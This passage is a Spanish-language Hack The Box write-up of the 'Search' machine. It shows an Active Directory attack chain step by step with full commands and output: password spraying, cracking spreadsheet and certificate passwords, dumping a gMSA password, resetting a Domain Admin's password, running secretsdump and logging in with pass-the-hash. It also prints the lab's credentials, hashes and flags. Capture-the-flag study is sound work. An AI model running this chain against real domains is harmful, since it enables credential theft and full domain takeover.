SMB         search.htb      445    RESEARCH         SYSVOL          READ            Logon server share
 π ~/htb/search ❯

SMB - Edgar Jacobs

Utilizando los usuarios que encontramos con bloodhound y las dos contraseñas ya conocidas, realizamos nuevamente Password Spraying.

1
2
3
4
5
6
7

 π ~/htb/search/usernames ❯ cat ../BloodHound.py/20220405224540_users.json|jq|grep '"name":"*'| cut -d ' ' -f10| cut -d '@' -f1| tr -d '"' > bloodhound_users.txt
 π ~/htb/search/usernames ❯ wc -l bloodhound_users.txt
107 bloodhound_users.txt
 π ~/htb/search/usernames ❯ cat passwords.txt
 @3ONEmillionbaby
IsolationIsKey?
 π ~/htb/search/usernames ❯

Encontramos que el usuario Edgar.Jacobs tiene acceso con la contraseña @3ONEmillionbaby, al igual que web_svc.

1
2
3
4
5
6
7
8
9

 π ~/htb/search/usernames ❯ crackmapexec smb search.htb -u bloodhound_users.txt -p passwords.txt --continue-on-success
SMB         search.htb      445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         search.htb      445    RESEARCH         [+] search.htb\WEB_SVC:@3ONEmillionbaby
[.. snip ..]
SMB         search.htb      445    RESEARCH         [+] search.htb\HOPE.SHARP:IsolationIsKey?
[.. snip ..]
SMB         search.htb      445    RESEARCH         [+] search.htb\EDGAR.JACOBS:@3ONEmillionbaby
[.. snip ..]
 π ~/htb/search/usernames ❯

SMB

Al enumerar los recursos de este usuario, vemos que tiene acceso a: CertEnroll, helpdesk, RedirectedFolders$.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

 π ~/htb/search/usernames ❯ crackmapexec smb search.htb -u EDGAR.JACOBS -p "@3ONEmillionbaby" --shares
SMB         search.htb      445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         search.htb      445    RESEARCH         [+] search.htb\EDGAR.JACOBS:@3ONEmillionbaby
SMB         search.htb      445    RESEARCH         [+] Enumerated shares
SMB         search.htb      445    RESEARCH         Share           Permissions     Remark
SMB         search.htb      445    RESEARCH         -----           -----------     ------
SMB         search.htb      445    RESEARCH         ADMIN$                          Remote Admin
SMB         search.htb      445    RESEARCH         C$                              Default share
SMB         search.htb      445    RESEARCH         CertEnroll      READ            Active Directory Certificate Services share
SMB         search.htb      445    RESEARCH         helpdesk        READ
SMB         search.htb      445    RESEARCH         IPC$            READ            Remote IPC
SMB         search.htb      445    RESEARCH         NETLOGON        READ            Logon server share
SMB         search.htb      445    RESEARCH         RedirectedFolders$ READ,WRITE
SMB         search.htb      445    RESEARCH         SYSVOL          READ            Logon server share
 π ~/htb/search/usernames ❯

En el recurso helpdesk no existe ningun archivo.

1
2
3
4
5
6
7
8
9

 π ~/htb/search/usernames ❯ smbclient //search.htb/helpdesk -U 'edgar.jacobs' # @3ONEmillionbaby
Enter WORKGROUP\edgar.jacobs's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  Dc        0  Tue Apr 14 06:24:23 2020
  ..                                 Dc        0  Tue Apr 14 06:24:23 2020

      3246079 blocks of size 4096. 418870 blocks available
smb: \>

Phishing - Passwords

Al revisar el recurso RedirectedFolders$ encontramos un archivo .xlsx en el directorio de Edgar.Jacobs.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

smb: \edgar.jacobs\Desktop\> ls
  .                                 DRc        0  Mon Aug 10 06:02:16 2020
  ..                                DRc        0  Mon Aug 10 06:02:16 2020
  $RECYCLE.BIN                     DHSc        0  Thu Apr  9 16:05:29 2020
  desktop.ini                      AHSc      282  Mon Aug 10 06:02:16 2020
  Microsoft Edge.lnk                 Ac     1450  Thu Apr  9 16:05:03 2020
  Phishing_Attempt.xlsx              Ac    23130  Mon Aug 10 06:35:44 2020

      3246079 blocks of size 4096. 418861 blocks available
smb: \edgar.jacobs\Desktop\>

Tras revisar el archivo, encontramos que existen 2 hojas, una de ellas está protegida por contraseña además vemos en esta una celda oculta (Celda C).
image

Utilizando xlsx2csv logramos obtener el valor de la hoja y celda protegida, observamos que son contraseñas.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

 π ~/htb/search/phishing ❯ xlsx2csv Phishing_Attempt.xlsx sheets -a
 π ~/htb/search/phishing ❯ cd sheets
 π ~/htb/search/phishing/sheets ❯ ls
 Captured.csv  'Passwords 01082020.csv'
 π ~/htb/search/phishing/sheets ❯ cat Captured.csv
Date,Captured Passwords,
01-01-18,78,
[.. snip ..]
06-01-19,81,
07-01-19,79,IT ChangeOver Keely Lyons Started
08-01-19,72,
[.. snip ..]
04-01-21,14,
 π ~/htb/search/phishing/sheets ❯ cat Passwords\ 01082020.csv
firstname,lastname,password,Username
Payton,Harmon,;;36!cried!INDIA!year!50;;,Payton.Harmon
Cortez,Hickman,..10-time-TALK-proud-66..,Cortez.Hickman
Bobby,Wolf,??47^before^WORLD^surprise^91??,Bobby.Wolf
Margaret,Robinson,//51+mountain+DEAR+noise+83//,Margaret.Robinson
Scarlett,Parks,++47|building|WARSAW|gave|60++,Scarlett.Parks
Eliezer,Jordan,!!05_goes_SEVEN_offer_83!!,Eliezer.Jordan
Hunter,Kirby,~~27%when%VILLAGE%full%00~~,Hunter.Kirby
Sierra,Frye,$$49=wide=STRAIGHT=jordan=28$$18,Sierra.Frye
Annabelle,Wells,==95~pass~QUIET~austria~77==,Annabelle.Wells
Eve,Galvan,//61!banker!FANCY!measure!25//,Eve.Galvan
Jeramiah,Fritz,??40:student:MAYOR:been:66??,Jeramiah.Fritz
Abby,Gonzalez,&&75:major:RADIO:state:93&&,Abby.Gonzalez
Joy,Costa,**30*venus*BALL*office*42**,Joy.Costa
Vincent,Sutton,**24&moment&BRAZIL&members&66**,Vincent.Sutton

,,,
 π ~/htb/search/phishing/sheets ❯

Creamos dos wordlist con contraseñas y usuarios, a partir del archivo .csv generado.

1
2
3
4
5
6
7

 π ~/htb/search/phishing/sheets ❯ cat Passwords\ 01082020.csv | cut -d ',' -f3 > phish_passwords.txt
 π ~/htb/search/phishing/sheets ❯ wc -l phish_passwords.txt
17 phish_passwords.txt
 π ~/htb/search/phishing/sheets ❯ cat Passwords\ 01082020.csv | cut -d ',' -f4 > phish_usernames.txt
 π ~/htb/search/phishing/sheets ❯ wc -l phish_usernames.txt
17 phish_usernames.txt
 π ~/htb/search/phishing/sheets ❯

Combinamos los wordlist phish_usernames.txt y bloodhound_users.txt, de igual forma phish_passwords.txt y passwords.txt.

1
2
3
4
5
6
7

 π ~/htb/search/usernames ❯ cat bloodhound_users.txt ../phishing/sheets/phish_usernames.txt | tr '[:upper:]' '[:lower:]' | sort | uniq > blood_phish_usernames.txt
 π ~/htb/search/usernames ❯ cat bloodhound_users.txt ../phishing/sheets/phish_usernames.txt | tr '[:upper:]' '[:lower:]' | sort | uniq | wc -l
109
 π ~/htb/search/usernames ❯ cat passwords.txt ../phishing/sheets/phish_passwords.txt > phish_known_passwords.txt
 π ~/htb/search/usernames ❯ wc -l phish_known_passwords.txt
19 phish_known_passwords.txt
 π ~/htb/search/usernames ❯

User - Sierra Frye

Nuevamente realizamos ‘brute force’ utilizando las contraseñas y usuarios nuevos encontrados. Encontramos la contraseña para sierra.frye.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

 π ~/htb/search/usernames ❯ crackmapexec smb search.htb -u blood_phish_usernames.txt -p phish_known_passwords.txt --continue-on-success|grep -v 'STATUS_LOGON_FAILURE'
SMB         search.htb      445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         search.htb      445    RESEARCH         [-] search.htb\: STATUS_ACCESS_DENIED
SMB         search.htb      445    RESEARCH         [-] search.htb\: STATUS_ACCESS_DENIED
SMB         search.htb      445    RESEARCH         [+] search.htb\edgar.jacobs:@3ONEmillionbaby
SMB         search.htb      445    RESEARCH         [-] search.htb\guest: STATUS_ACCOUNT_DISABLED
SMB         search.htb      445    RESEARCH         [-] search.htb\guest: STATUS_ACCOUNT_DISABLED
SMB         search.htb      445    RESEARCH         [+] search.htb\hope.sharp:IsolationIsKey?
SMB         search.htb      445    RESEARCH         [+] search.htb\sierra.frye:$$49=wide=STRAIGHT=jordan=28$$18
SMB         search.htb      445    RESEARCH         [+] search.htb\web_svc:@3ONEmillionbaby
 π ~/htb/search/usernames ❯

Ingresamos a RedirectedFolders$ donde encontramos y descargamos la flag user.txt.

1
2
3

 π ~/htb/search ❯ cat user.txt
ad2a8266d4a4767ffe773770a94de7d9
 π ~/htb/search ❯

Certs

Además en la carpeta \backup observamos dos certificados que seguramente estan relacionados a la página /staff.

1
2
3
4
5
6
7
8

smb: \sierra.frye\downloads\backups\> ls
  .                                 DHc        0  Mon Aug 10 16:39:17 2020
  ..                                DHc        0  Mon Aug 10 16:39:17 2020
  search-RESEARCH-CA.p12             Ac     2643  Fri Jul 31 11:04:11 2020
  staff.pfx                          Ac     4326  Mon Aug 10 16:39:17 2020

      3246079 blocks of size 4096. 676825 blocks available
smb: \sierra.frye\downloads\backups\>

Al intentar importar los certificados vemos que ambos estan protegidos por una contraseña.
image

Password Hash Cracking

Utilizamos pfx2john.py para obtener el hash de ambos certificados, y utilizando john con el wordlist rockyou.txt logramos obtener la contraseña para ambos, la cual es la misma.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

 π ~/htb/search/cert_sierra ❯ john --wordlist=$ROCK staff_pfx_hash
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
misspissy        (staff.pfx)
1g 0:00:01:20 DONE (2022-03-10 20:00) 0.01237g/s 67886p/s 67886c/s 67886C/s misssnamy..missnono
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
 π ~/htb/search/cert_sierra ❯

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

π ~/htb/search/cert_sierra ❯ john --wordlist=$ROCK search_p12_hash
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
misspissy        (search-RESEARCH-CA.p12)
1g 0:00:01:30 DONE (2022-03-10 20:02) 0.01110g/s 60878p/s 60878c/s 60878C/s misssnamy..missnono
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
 π ~/htb/search/cert_sierra ❯

PowerShell Web

Importamos y seleccionamos el certificado de staff.pfx tras visitar /staff.
image

Vemos un panel de acceso por PowerShell.
image

Utilizando las credenciales de sierra.frye logramos acceder a este.

1
2
3

USER: sierra.frye
PASS: $$49=wide=STRAIGHT=jordan=28$$18
COMPUTER NAME: RESEARCH

image

Privesc

Tras examinar los directorios, no encontramos información relevante, por lo que revisamos nuevamente la información en Bloodhound.

BloodHound

Utilizando los queries predefinidos encontramos una ruta para obtener acceso como Domain Admin.

  • Inicialmente vemos a sierra.frye miembro de los grupos Birmingham-ITSec, ITSec, este último puede obtener la contraseña del usuario BIR-ADFS-GMSA.
  • Seguidamente vemos que BIR-ADFS-GMSA tiene permisos GenericAll sobre el usuario Tristan.Davies el cual pertenece al grupo de Domain Admins.
    image

BIR-ADFS-GMSA

GMSA

Bloodhound sugiere utilizar gmsapasswordreader.exe aunque no fué posible conectarnos desde la máquina a nuestro servidor samba para descargar este ejecutable.
image

Utilizamos gMSADumper para obtener el hash de BIR-ADFS-GMSA utilizando las credenciales de sierra.frye.

1
2
3
4
5

 π gMSADumper main ✗ ❯ ./gMSADumper.py -u sierra.frye -p '$$49=wide=STRAIGHT=jordan=28$$18' -l 10.10.11.129 -d search.htb
Users or groups who can read password for BIR-ADFS-GMSA$:
 > ITSec
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f
 π gMSADumper main ✗ ❯

Sin embargo, tras intentar autenticarnos con el hash no fué posible, de igual forma crackear el hash.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

 π ~/htb/search ❯ impacket-psexec "BIR-ADFS-GMSA$"@search.htb -hashes :e1e9fd9e46d0d747e1595167eedcec0f
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on search.htb.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'CertEnroll' is not writable.
[-] share 'helpdesk' is not writable.
[-] share 'NETLOGON' is not writable.
[*] Found writable share RedirectedFolders$
[*] Uploading file WFSVyazG.exe
[*] Opening SVCManager on search.htb.....
[-] Error opening SVCManager on search.htb.....
[-] Error performing the installation, cleaning up: Unable to open SVCManager
 π ~/htb/search ❯

Investigando sobre GMSA en Windows encontramos un post sobre ReadGMSAPassword en PowerShell, donde se muestran comandos para la lectura de la contraseña.

1
2
3

$gmsa = Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA$' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
ConvertFrom-ADManagedPasswordBlob $mp

Tras ejecutar los comandos vemos la contraseña en ’texto plano’ pero toma caracteres ilegibles, aunque vemos que tiene la ‘propiedad’ SecureString lo que podríamos utilizar para ejecutar comandos como en Arkham - HTB.
image

Inicialmente en la variable $secure vamos a obtener la propiedad SecureString para usarla como contraseña en PSCredential.

1
2
3
4
5
6
7
8
9

# GMSA
$gmsa = Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA$' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
$secure = ConvertFrom-ADManagedPasswordBlob $mp

# Credentials
$username ="BIR-ADFS-GMSA";
$password = $secure.SecureCurrentPassword; 
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList $username, $password;

Finalmente con Invoke-Command ejecutamos comandos.

1
2

# Run Commands
Invoke-Command -ScriptBlock { whoami } -ComputerName RESEARCH -Credential $cred

Tras ejecutar el último comando vemos que tenemos acceso como BIR-ADFS-GMSA.
image

Tristan Davies

Como sabemos BIR-ADFS-GMSA tiene permisos GenericAll sobre tristan.davies, segun la información que proporciona Bloodhound es posible realizar kerberoasting o cambiar la contraseña del usuario.

Ya que tenemos acceso como BIR-ADFS-GMSA realizamos un cambio de contraseña a tristan.

1

Invoke-Command -ScriptBlock { net user tristan.davies Password123! /domain } -ComputerName RESEARCH -Credential $cred

Observamos que el comando fue ejecutado exitosamente.
image

Tras ejecutar CrackMapExec vemos que tenemos acceso a todos los recursos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

 π ~/htb/search ❯ crackmapexec smb search.htb -u tristan.davies -p 'Password123!' --shares
SMB         search.htb      445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         search.htb      445    RESEARCH         [+] search.htb\tristan.davies:Password123! (Pwn3d!)
SMB         search.htb      445    RESEARCH         [+] Enumerated shares
SMB         search.htb      445    RESEARCH         Share           Permissions     Remark
SMB         search.htb      445    RESEARCH         -----           -----------     ------
SMB         search.htb      445    RESEARCH         ADMIN$          READ,WRITE      Remote Admin
SMB         search.htb      445    RESEARCH         C$              READ,WRITE      Default share
SMB         search.htb      445    RESEARCH         CertEnroll      READ,WRITE      Active Directory Certificate Services share
SMB         search.htb      445    RESEARCH         helpdesk
SMB         search.htb      445    RESEARCH         IPC$            READ            Remote IPC
SMB         search.htb      445    RESEARCH         NETLOGON        READ,WRITE      Logon server share
SMB         search.htb      445    RESEARCH         RedirectedFolders$ READ,WRITE
SMB         search.htb      445    RESEARCH         SYSVOL          READ            Logon server share
 π ~/htb/search ❯

Administrator

Utilizamos secretsdump para obtener el hash del usuario Administrator.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

 π ~/htb/search ❯ impacket-secretsdump tristan.davies:'Password123!'@search.htb -just-dc-user Administrator
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:c870b887ebb9c0900fc3c1ef25e0592c4da89bf7eb1cf6d3064d44afb2dc86f9
Administrator:aes128-cts-hmac-sha1-96:07431caa0e0c70a2adc8f9ce43e181b1
Administrator:des-cbc-md5:52d02af1f2fba43e
[*] Cleaning up...
 π ~/htb/search ❯

Shell

Finalmente utilizando wmiexec logramos obtener una shell y la flag root.tsxt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

 π ~/htb/search ❯ impacket-wmiexec administrator@search.htb -hashes aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
search\administrator

C:\>cd Users/Administrator/Desktop
C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is B8F8-6F48

 Directory of C:\Users\Administrator\Desktop

22/11/2021  21:21    <DIR>          .
22/11/2021  21:21    <DIR>          ..
09/04/2022  02:22                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   2,568,282,112 bytes free

C:\Users\Administrator\Desktop>type root.txt
284a14da6bec1277cd63ff3c81d18c2e

C:\Users\Administrator\Desktop>
Share on
Dany Sucuc
WRITTEN BY
sckull
RedTeamer & Pentester wannabe

Read other posts

HTB: Search